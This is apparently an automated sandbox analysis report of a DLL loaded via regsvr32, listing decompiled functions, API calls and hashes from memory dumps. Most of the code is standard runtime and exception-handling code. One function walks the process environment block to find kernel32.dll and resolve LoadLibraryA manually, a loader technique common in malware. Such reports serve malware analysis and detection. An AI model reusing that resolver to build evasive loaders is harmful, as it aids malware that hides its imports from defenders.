FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E9E8681
TextOutW.GDI32(00000000,00000000,00000000,00000000,00000000), ref: 6E9E86A2

Strings

$, xrefs: 6E9E8A51

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: FormatLibraryLoadMessageText
String ID: $
API String ID: 775064453-3993045852
Opcode ID: bca75b851b2be10c8dbc2a778128c5f0c890b50445de05bc16343553a978b486
Instruction ID: 59ff1840f326400d3893ccaa3ab062e28d5638839030e706fb7ed5452b6354da
Opcode Fuzzy Hash: bca75b851b2be10c8dbc2a778128c5f0c890b50445de05bc16343553a978b486
Instruction Fuzzy Hash: E3C1D070A58208FFDF69DFE9D44978C3BB4AF06341F588415FA0AAAA44D770D980CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E9839 Relevance: 6.1, APIs: 4, Instructions: 73
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E6E9E9839(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E6E9E9954(_t34);
				 *_t60 = 0x2cc;
				_v632 = E6E9EA330(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E6E9EA330(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E6E9E9954(_t49);
				}
				return _t49;
			}

0x6e9e9839
0x6e9e9839
0x6e9e9839
0x6e9e984d
0x6e9e984f
0x6e9e9852
0x6e9e9852
0x6e9e9856
0x6e9e985b
0x6e9e9873
0x6e9e9879
0x6e9e987f
0x6e9e9885
0x6e9e988b
0x6e9e9891
0x6e9e9897
0x6e9e989e
0x6e9e98a5
0x6e9e98ac
0x6e9e98b3
0x6e9e98ba
0x6e9e98c1
0x6e9e98c2
0x6e9e98cb
0x6e9e98d1
0x6e9e98d4
0x6e9e98da
0x6e9e98e9
0x6e9e98f5
0x6e9e9900
0x6e9e9907
0x6e9e990e
0x6e9e9919
0x6e9e9921
0x6e9e992a
0x6e9e992c
0x6e9e992f
0x6e9e9931
0x6e9e993b
0x6e9e9943
0x6e9e9949
0x00000000
0x6e9e9950
0x6e9e9953

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6E9E9845
IsDebuggerPresent.KERNEL32 ref: 6E9E9911
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E9E9931
UnhandledExceptionFilter.KERNEL32(?), ref: 6E9E993B

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: bdf2bff44fedb95459b57ec19c1413db7c72c2c85e8b25c768b2b37574e95dfc
Instruction ID: 4379d27cb7055d54488a1f4e0907d7e99959702ae60cf3d104b3b67b57c1cd93
Opcode Fuzzy Hash: bdf2bff44fedb95459b57ec19c1413db7c72c2c85e8b25c768b2b37574e95dfc
Instruction Fuzzy Hash: 8B3105B5D052199BDF11DFA4D989BCDBBB8AF08304F1040EAE50DAB250EB709A888F54

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E9CF7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9E9CF7(intOrPtr* __ecx, void* __eflags) {
				intOrPtr* _t13;

				_t13 = __ecx;
				E6E9E9D4A(__ecx);
				 *__ecx = 0x38;
				 *((intOrPtr*)(__ecx + 8)) = 0x6e9e0000;
				 *((intOrPtr*)(__ecx + 4)) = 0x6e9e0000;
				 *((intOrPtr*)(__ecx + 0xc)) = 0xe00;
				 *((intOrPtr*)(__ecx + 0x10)) = 0x6e9f53dc;
				if(E6E9E5D50(__ecx + 0x14) < 0) {
					if(IsDebuggerPresent() != 0) {
						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
					}
					 *0x6e9fcb28 = 1;
				}
				return _t13;
			}

0x6e9e9cf8
0x6e9e9cfa
0x6e9e9d04
0x6e9e9d0d
0x6e9e9d10
0x6e9e9d13
0x6e9e9d1a
0x6e9e9d28
0x6e9e9d32
0x6e9e9d39
0x6e9e9d39
0x6e9e9d3f
0x6e9e9d3f
0x6e9e9d49

APIs

Part of subcall function 6E9E5D50: GetLastError.KERNEL32(?,?,?,6E9FA66C), ref: 6E9E5D74

IsDebuggerPresent.KERNEL32(?,?,6E9FA66C,?,?,?,?,?,?,?,00000000,?,6E9F46B0,000000FF,?,6E9E1E0A), ref: 6E9E9D2A
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,6E9FA66C,?,?,?,?,?,?,?,00000000,?,6E9F46B0,000000FF), ref: 6E9E9D39

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6E9E9D34

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: DebugDebuggerErrorLastOutputPresentString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 389471666-631824599
Opcode ID: 56b374313c801ba88106d29ce0fb28828afe02c9e103f65152f013a778935887
Instruction ID: a00d1194fd87c407e007267839a63698ac295e5356b9c317b55cfb9c48d84ea3
Opcode Fuzzy Hash: 56b374313c801ba88106d29ce0fb28828afe02c9e103f65152f013a778935887
Instruction Fuzzy Hash: 67E039B0114711CAD3229FA8E4047827AE4AF06315F04885CE95ACAA00EBB0D889CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EC0A3 Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E6E9EC0A3(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, char _a4, char _a8, char _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0x6e9fc024; // 0x45ebcfb3
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E6E9E9954(_t41);
					_pop(_t61);
				}
				E6E9EA330(_t66,  &_v804, 0, 0x50);
				E6E9EA330(_t66,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_t23 =  &_v0; // 0x6e9fcd24
				_v540 =  *_t23;
				_t25 =  &_v0; // 0x6e9e4f85
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_t28 = _t49 - 4; // 0xb804c483
				_v544 =  *_t28;
				_t30 =  &_a8; // 0x55cccccc
				_v804 =  *_t30;
				_t32 =  &_a12; // 0xec83ec8b
				_v800 =  *_t32;
				_t34 =  &_v0; // 0x6e9fcd24
				_v792 =  *_t34;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // 0x6e9e4c59
				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_t38 =  &_a4; // 0xc35de58b
					_push( *_t38);
					_t57 = E6E9E9954(_t57);
				}
				_t39 =  &_v8; // 0x41d2
				return E6E9E9ADF(_t57, _t60,  *_t39 ^ _t69, _t65, _t67, _t68);
			}

0x6e9ec0a3
0x6e9ec0a3
0x6e9ec0a3
0x6e9ec0ae
0x6e9ec0b3
0x6e9ec0b5
0x6e9ec0bd
0x6e9ec0bf
0x6e9ec0c2
0x6e9ec0c7
0x6e9ec0c7
0x6e9ec0d3
0x6e9ec0e6
0x6e9ec0f4
0x6e9ec0fa
0x6e9ec100
0x6e9ec106
0x6e9ec10c
0x6e9ec112
0x6e9ec118
0x6e9ec11e
0x6e9ec124
0x6e9ec12a
0x6e9ec131
0x6e9ec138
0x6e9ec13f
0x6e9ec146
0x6e9ec14d
0x6e9ec154
0x6e9ec155
0x6e9ec15b
0x6e9ec15e
0x6e9ec164
0x6e9ec164
0x6e9ec167
0x6e9ec16d
0x6e9ec177
0x6e9ec17a
0x6e9ec180
0x6e9ec183
0x6e9ec189
0x6e9ec18c
0x6e9ec192
0x6e9ec195
0x6e9ec1a3
0x6e9ec1a5
0x6e9ec1ab
0x6e9ec1ba
0x6e9ec1c6
0x6e9ec1c6
0x6e9ec1c9
0x6e9ec1ce
0x6e9ec1cf
0x6e9ec1db

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6E9EC19B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E9EC1A5
UnhandledExceptionFilter.KERNEL32(6E9E4C59,?,?,?,?,?,?), ref: 6E9EC1B2

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: af47a0ff78d8b7904cae9d76f296d2cf6ac6508ba34339cda8bfa863807f4a04
Instruction ID: 799548de309bab89fcb77cd075c75e19c3092dffc70484bd4b9240d3c0e7f296
Opcode Fuzzy Hash: af47a0ff78d8b7904cae9d76f296d2cf6ac6508ba34339cda8bfa863807f4a04
Instruction Fuzzy Hash: 2D310671901329ABCB61DF64D888BCDBBB8BF18310F5041DAE51CAB250E7709F858F44

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EC865 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E9EC865(int _a4) {
				void* _t14;

				if(E6E9EE9B4(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E6E9EC8EA(_t14, _a4);
				ExitProcess(_a4);
			}

0x6e9ec872
0x6e9ec88e
0x6e9ec88e
0x6e9ec897
0x6e9ec8a0

APIs

GetCurrentProcess.KERNEL32(?,?,6E9EC864,?,00000001,?,?), ref: 6E9EC887
TerminateProcess.KERNEL32(00000000,?,6E9EC864,?,00000001,?,?), ref: 6E9EC88E
ExitProcess.KERNEL32 ref: 6E9EC8A0

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 4e76e5e6924bc1bc8a31ad3c488db971cccdd878e9bf1234810bb6f98c2bae6d
Instruction ID: 024b2e953991d1b603c5d15b845cab8bb2f5d94298a8a3a0d994e32bf42a8700
Opcode Fuzzy Hash: 4e76e5e6924bc1bc8a31ad3c488db971cccdd878e9bf1234810bb6f98c2bae6d
Instruction Fuzzy Hash: BDE0B631414988AFCF426B94DA58A983FADFF81645B054824FA4A8A520EB39ED51DEC4

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E1490 Relevance: 2.6, Strings: 2, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9E1490(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v5;
				intOrPtr* _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _t44;

				_v24 = 0xc;
				_v32 = 0x10;
				_v36 = 0x10;
				_v20 =  *[fs:0x30];
				_v28 =  *((intOrPtr*)(_v20 + _v24));
				_v16 =  *((intOrPtr*)(_v28 + _v32));
				_v56 =  *((intOrPtr*)(_v16 + _v36));
				_v12 = _v16;
				while(1) {
					_v12 =  *_v12;
					_t44 = _v12;
					_t75 =  *((intOrPtr*)(_t44 + 0x18));
					if( *((intOrPtr*)(_t44 + 0x18)) != 0 && E6E9E1270( &_v5, _t75, _v12 + 0x30, L"kernel32.dll") == 0) {
						break;
					}
					__eflags = _v16 - _v12;
					if(__eflags != 0) {
						continue;
					}
					L5:
					_v44 =  *((intOrPtr*)(_v12 + 0x18));
					_v40 = E6E9E8C90("LoadLibraryA", 0xc, 0xa);
					 *0x6e9fc958 = E6E9E1640(_v44, _v40, 0xc, 0xa);
					_v48 = E6E9E1580(_a8, _a8);
					_v52 = E6E9E1640(_v48, _a4, _a12, _a16);
					return _v52;
				}
				goto L5;
			}

0x6e9e1496
0x6e9e149d
0x6e9e14a4
0x6e9e14b1
0x6e9e14bc
0x6e9e14c7
0x6e9e14d2
0x6e9e14d8
0x6e9e14db
0x6e9e14e9
0x6e9e14ec
0x6e9e14ef
0x6e9e14f3
0x00000000
0x00000000
0x6e9e1512
0x6e9e1515
0x00000000
0x00000000
0x6e9e1517
0x6e9e151d
0x6e9e152e
0x6e9e1542
0x6e9e1550
0x6e9e1568
0x6e9e1571
0x6e9e1571
0x00000000

Strings

kernel32.dll, xrefs: 6E9E14F5
LoadLibraryA, xrefs: 6E9E1524

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID:
String ID: LoadLibraryA$kernel32.dll
API String ID: 0-2572683754
Opcode ID: 160f1a22af0d27670abfc6bde6b13eda3a8e8a2831bb645dd0b47e84f29fa563
Instruction ID: 4fc653c7700c868fe6510c35324a37f74eb8e52a94f946b1cbaef3543aad64b4
Opcode Fuzzy Hash: 160f1a22af0d27670abfc6bde6b13eda3a8e8a2831bb645dd0b47e84f29fa563
Instruction Fuzzy Hash: AF31C374E00208EFDB04CFD9C880AEEBBB5BF89304F108559E615AB754D730AA45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F3EB6 Relevance: 1.8, APIs: 1, Instructions: 274
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E6E9F3EB6(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E6E9F38E5(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E6E9F3851(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x6e9f3ec4
0x6e9f3ecb
0x6e9f3ed0
0x6e9f3ed6
0x6e9f3ed9
0x6e9f3edf
0x6e9f3ee4
0x6e9f3ee9
0x6e9f3ee9
0x6e9f3eef
0x6e9f3ef4
0x6e9f3ef9
0x6e9f3ef9
0x6e9f3f00
0x6e9f3f05
0x6e9f3f0a
0x6e9f3f0a
0x6e9f3f11
0x6e9f3f16
0x6e9f3f1b
0x6e9f3f1b
0x6e9f3f22
0x6e9f3f27
0x6e9f3f2c
0x6e9f3f2c
0x6e9f3f34
0x6e9f3f44
0x6e9f3f56
0x6e9f3f68
0x6e9f3f7b
0x6e9f3f8d
0x6e9f3f95
0x6e9f3f9a
0x6e9f3f9f
0x6e9f3f9f
0x6e9f3fa6
0x6e9f3fab
0x6e9f3fab
0x6e9f3fb2
0x6e9f3fb7
0x6e9f3fb7
0x6e9f3fbe
0x6e9f3fc3
0x6e9f3fc3
0x6e9f3fca
0x6e9f3fcf
0x6e9f3fcf
0x6e9f3fd9
0x6e9f3fdb
0x6e9f4015
0x6e9f3fdd
0x6e9f3fe2
0x6e9f4006
0x6e9f400e
0x6e9f4002
0x6e9f4002
0x6e9f4018
0x6e9f401f
0x6e9f4021
0x6e9f4043
0x6e9f404b
0x6e9f404e
0x6e9f404e
0x6e9f4050
0x6e9f4050
0x6e9f405b
0x6e9f4061
0x6e9f4066
0x6e9f406d
0x6e9f40a7
0x6e9f40b2
0x6e9f40b8
0x6e9f40bb
0x6e9f40be
0x6e9f40ca
0x6e9f40d2
0x6e9f406f
0x6e9f4072
0x6e9f407e
0x6e9f4084
0x6e9f408a
0x6e9f408d
0x6e9f4096
0x6e9f4096
0x6e9f40d5
0x6e9f40e3
0x6e9f40e9
0x6e9f40ec
0x6e9f40f1
0x6e9f40f3
0x6e9f40f6
0x6e9f40f6
0x6e9f40fb
0x6e9f40fd
0x6e9f4100
0x6e9f4100
0x6e9f4105
0x6e9f4107
0x6e9f410a
0x6e9f410a
0x6e9f410f
0x6e9f4111
0x6e9f4114
0x6e9f4114
0x6e9f4119
0x6e9f411b
0x6e9f411b
0x6e9f4128
0x6e9f412b
0x6e9f4162
0x6e9f412d
0x6e9f412d
0x6e9f4130
0x6e9f415b
0x6e9f4150
0x6e9f4150
0x6e9f4164
0x6e9f416c
0x6e9f416f
0x6e9f418e
0x6e9f4193
0x6e9f4193
0x6e9f4195
0x6e9f419a
0x6e9f41a6
0x6e9f419c
0x6e9f419f
0x6e9f419f
0x6e9f41ab
0x6e9f41ab
0x6e9f4171
0x6e9f4174
0x6e9f4183
0x00000000
0x6e9f4183
0x6e9f4176
0x6e9f4179
0x6e9f417b
0x6e9f417b
0x00000000
0x6e9f4179
0x6e9f4132
0x6e9f4135
0x6e9f414b
0x00000000
0x6e9f414b
0x6e9f413a
0x6e9f413c
0x6e9f413c
0x6e9f413a
0x00000000
0x6e9f412b
0x6e9f4028
0x6e9f4036
0x6e9f403e
0x00000000
0x6e9f403e
0x6e9f402c
0x6e9f4031
0x6e9f4031
0x00000000
0x6e9f402c
0x6e9f3fe9
0x6e9f3ff7
0x6e9f3fff
0x00000000
0x6e9f3fff
0x6e9f3fed
0x6e9f3ff2
0x6e9f3ff2
0x6e9f3fed

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E9F3EB1,?,?,00000008,?,?,6E9F3B49,00000000), ref: 6E9F40E3

Memory Dump Source

